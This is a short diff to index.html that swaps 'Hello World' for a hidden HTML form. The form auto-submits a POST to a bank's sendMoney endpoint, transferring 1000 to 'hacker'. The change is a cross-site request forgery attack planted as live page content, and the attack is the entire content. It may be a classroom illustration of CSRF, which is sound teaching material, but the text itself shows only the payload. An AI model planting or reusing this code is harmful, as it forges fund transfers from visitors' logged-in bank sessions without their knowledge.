--- a/index.html
+++ b/index.html
@@ -1,1 +1,8 @@
-Hello World
+<form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST">
+ <input type="hidden" name="giveMoneyTo" value="hacker" />
+ <input type="hidden" name="giveAmount" value="1000" />
+ <input type="submit"/>
+</form>
+<script>
+ document.csrfForm.submit();
+</script>
